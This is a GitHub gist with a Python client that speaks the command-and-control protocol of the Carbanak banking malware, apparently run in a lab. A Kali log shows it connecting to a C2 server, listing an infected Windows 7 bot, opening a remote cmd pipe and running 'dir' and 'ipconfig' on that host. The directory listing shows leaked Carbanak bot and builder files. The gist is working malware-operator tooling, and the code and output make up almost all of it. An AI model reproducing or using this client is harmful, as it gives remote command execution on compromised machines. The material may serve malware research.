Created
August 15, 2019 14:29
-
-
Save ecks/c1219dfe4e14dc40929a0b277321f8ed to your computer and use it in GitHub Desktop.
Carbanak Server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
import hashlib | |
import struct | |
import time | |
class IdUid: | |
def __init__(self): | |
id = None | |
uid = None | |
info = None | |
ip = None | |
comment = None | |
ports = None | |
idGroups = None | |
class StreamPipeInfo: | |
def __init__(self): | |
id = None | |
namePipe = None | |
class Server: | |
def __init__(self): | |
self.CmdGetIds = 1 | |
self.CmdSendCmd = 2 | |
self.CmdJoinStream = 5 | |
self.CmdGetPipeStreams = 11 | |
self.CmdPutPipeData = 12 | |
self.HOST = '192.168.12.137' | |
self.PORT = 800 | |
self.PSWD_HASH = hashlib.md5("password".encode('utf-8')).digest() | |
self.s = self.Get_Connect() | |
def putBytes(self, data, index, size): | |
self.s.sendall(data) | |
def getInt(self): | |
return struct.unpack('i', self.s.recv(4))[0] | |
def putInt(self, data): | |
self.s.sendall(struct.pack('i', data)) | |
def getShort(self): | |
return struct.unpack('h', self.s.recv(2))[0] | |
def putShort(self, data): | |
self.s.sendall(struct.pack('h', data)) | |
def getString(self): | |
len = self.getShort() | |
byte_string = struct.unpack(str(len)+'s', self.s.recv(len))[0] | |
return byte_string.decode("1251") | |
def putString(self, data): | |
self.putShort(len(data)) | |
self.s.sendall(bytearray(data, "1251")) | |
# called from init | |
def Get_Connect(self): | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((self.HOST, self.PORT)) | |
s.sendall(self.PSWD_HASH) | |
return s | |
def GetConnect(self, id, cmd): | |
data = struct.pack('ii', id, cmd) | |
self.s.sendall(data) | |
def CM_GetIds(self): | |
ret = [] | |
self.GetConnect(0, self.CmdGetIds) | |
count = self.getInt() | |
print('count', count) | |
if count > 0: | |
iu = IdUid() | |
id = self.getInt() | |
print('id', id) | |
iu.id = id | |
uid = self.getString() | |
print('uid', uid) | |
iu.uid = uid | |
info = self.getString() | |
print('info', info) | |
iu.info = info | |
ip = self.getString() | |
print('ip', ip) | |
iu.ip = ip | |
comment = self.getString() | |
print('comment', comment) | |
iu.comment = comment | |
ports = self.getString() | |
print('ports', ports) | |
iu.ports = ports | |
idGroups = self.getInt() | |
print('idGroups', idGroups) | |
iu.idGroups = idGroups | |
ret.append(iu) | |
return ret | |
def CM_SendCmd(self, id, uid, cmd): | |
self.GetConnect(id, self.CmdSendCmd) | |
self.putString(cmd) | |
def CM_GetStream(self, id, uid, idStream): | |
self.GetConnect(id, self.CmdJoinStream) | |
self.putInt(idStream) | |
return self.s | |
def CM_GetPipeStreams(self, id, uid, nameId): | |
self.GetConnect(id, self.CmdGetPipeStreams) | |
self.putString(nameId) | |
count = self.getShort() | |
ret = [None] * count | |
for i in range(count): | |
idStream = self.getInt() | |
namePipe = self.getString() | |
print(repr(idStream)) | |
print(repr(namePipe)) | |
ret[i] = StreamPipeInfo() | |
ret[i].id = idStream; | |
ret[i].namePipe = namePipe; | |
return ret | |
def CM_PutPipeData(self, id, uid, namePipe, data, count): | |
self.GetConnect(id, self.CmdPutPipeData) | |
self.putString(namePipe) | |
self.putInt(count) | |
self.putBytes(data, 0, count) | |
return True | |
def StarterCmd(ids): | |
Server().CM_SendCmd(ids[0].id, ids[0].uid, "cmd") | |
# wait a bit for pipe to become available | |
time.sleep(10) | |
pipes = Server().CM_GetPipeStreams(ids[0].id, ids[0].uid, "cmd") | |
jS = Server().CM_GetStream(ids[0].id, ids[0].uid, pipes[0].id) # joined Stream Socket | |
return pipes, jS | |
def SendInput(user_cmd, id, uid, pipeId, namePipe): | |
user_cmd = user_cmd+"\r\n" | |
sz_data = len(user_cmd) | |
# cmd (UInt32), answer (byte * 32), func (UInt32), tag (UInt32), sz_data (Int32) | |
msg_pack = struct.Struct("I32sIIi") | |
msg = msg_pack.pack(1, bytearray('\x00' * 32, 'utf-8'), 0, 0, sz_data) | |
user_data = bytearray(user_cmd, "866") # old school USSR 866 encoding | |
sz = 2 + msg_pack.size + sz_data + 4 + 4 + 2 | |
data = bytearray(sz) | |
i = 0 | |
struct.pack_into("i", data, i, msg_pack.size) | |
i += 1 | |
struct.pack_into("i", data, i, sz_data) | |
i += 1 | |
data[i:i+msg_pack.size] = msg | |
i += msg_pack.size | |
data[i:i+sz_data] = user_data | |
i += sz_data | |
struct.pack_into("I", data, i, 55) | |
i += 4 | |
struct.pack_into("I", data, i, pipeId) | |
i += 4 | |
struct.pack_into("H", data, i, 0) | |
i += 2 | |
Server().CM_PutPipeData(id, uid, namePipe, data, sz) | |
# read from joined socket | |
def CmdOutputer(jS): | |
time.sleep(10) | |
# read output from socket | |
out = jS.recv(2048) | |
out = out.decode("866") | |
print(out) | |
ids = Server().CM_GetIds() | |
pipes, jS = StarterCmd(ids) | |
SendInput("dir", ids[0].id, ids[0].uid, pipes[0].id, pipes[0].namePipe) | |
CmdOutputer(jS) | |
time.sleep(10) | |
SendInput("ipconfig", ids[0].id, ids[0].uid, pipes[0].id, pipes[0].namePipe) | |
CmdOutputer(jS) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
root@kali:~/carbanak_rpc# python3 server.py | |
count 1 | |
id 1 | |
uid example0c3d2682004a49022 | |
info OS: Win7SP1.x64, Domain: WIN-GS0JF9KMEJ2, User: ecks, Ver: 1.3 | |
ip 192.168.12.136 | |
comment | |
ports | |
idGroups 0 | |
1 | |
'GCZScvcfzUbGNcYDj' | |
║ Microsoft Windows [Version 6.1.7601] | |
Copyright (c) 2009 Microsoft Corporation. All rights reserved. | |
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????>C═ dir | |
Volume in drive C has no label. | |
Volume Serial Number is 4CBF-78E0 | |
Directory of C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ????? | |
08/15/2019 07:18 AM <DIR> . | |
08/15/2019 07:18 AM <DIR> .. | |
07/22/2019 10:01 PM 147,456 bot.dll | |
07/22/2019 10:01 PM 150,528 bot.exe | |
07/22/2019 10:01 PM 100,352 botcmd.exe | |
07/22/2019 10:01 PM 6,773 bot_cmd.txt | |
08/15/2019 07:18 AM 150,528 bot_out.exe | |
07/22/2019 10:01 PM 155,136 bot_x64.dll | |
07/22/2019 10:01 PM 155,136 bot_x64.exe | |
07/22/2019 10:01 PM 88,576 builder.exe | |
07/22/2019 10:01 PM 6 builder_gui.config | |
07/22/2019 10:01 PM 3,507,712 builder_gui.exe | |
07/22/2019 10:01 PM 142,336 CmdManager.exe | |
07/22/2019 10:01 PM 98 CmdManager.xml | |
07/22/2019 10:01 PM 184 config_server.xml | |
08/15/2019 07:17 AM 1,076 example.config | |
07/22/2019 10:01 PM 74,752 Player.dll | |
07/22/2019 10:01 PM 6,656 PlayerExe.exe | |
08/15/2019 07:18 AM 308 private.key | |
08/15/2019 07:18 AM 84 public.key | |
08/15/2019 07:18 AM 348 public_key.txt | |
07/22/2019 10:01 PM 153,600 Server.exe | |
07/22/2019 10:01 PM 147,968 VncSharp.dll | |
07/22/2019 10:01 PM <DIR> _plugins | |
21 File(s) 4,989,613 bytes | |
3 Dir(s) 37,535,412,224 bytes free | |
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????> | |
ipconfig | |
Г╚ | |
Windows IP Configuration | |
Ethernet adapter Bluetooth Network Connection: | |
Media State . . . . . . . . . . . : Media disconnected | |
Connection-specific DNS Suffix . : | |
Ethernet adapter Local Area Connection: | |
Connection-specific DNS Suffix . : localdomain | |
Link-local IPv6 Address . . . . . : fe80::f506:2f75:c598:7843%11 | |
IPv4 Address. . . . . . . . . . . : 192.168.12.136 | |
Subnet Mask . . . . . . . . . . . : 255.255.255.0 | |
Default Gateway . . . . . . . . . : | |
Tunnel adapter isatap.{9B02B57E-595C-4236-9E7C-08CE5E649765}: | |
Media State . . . . . . . . . . . : Media disconnected | |
Connection-specific DNS Suffix . : | |
Tunnel adapter isatap.localdomain: | |
Media State . . . . . . . . . . . : Media disconnected | |
Connection-specific DNS Suffix . : localdomain | |
C:\code\Updated-Carbanak-Source-with-Plugins\Carbanak - part 2\?????? ???? ?????> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment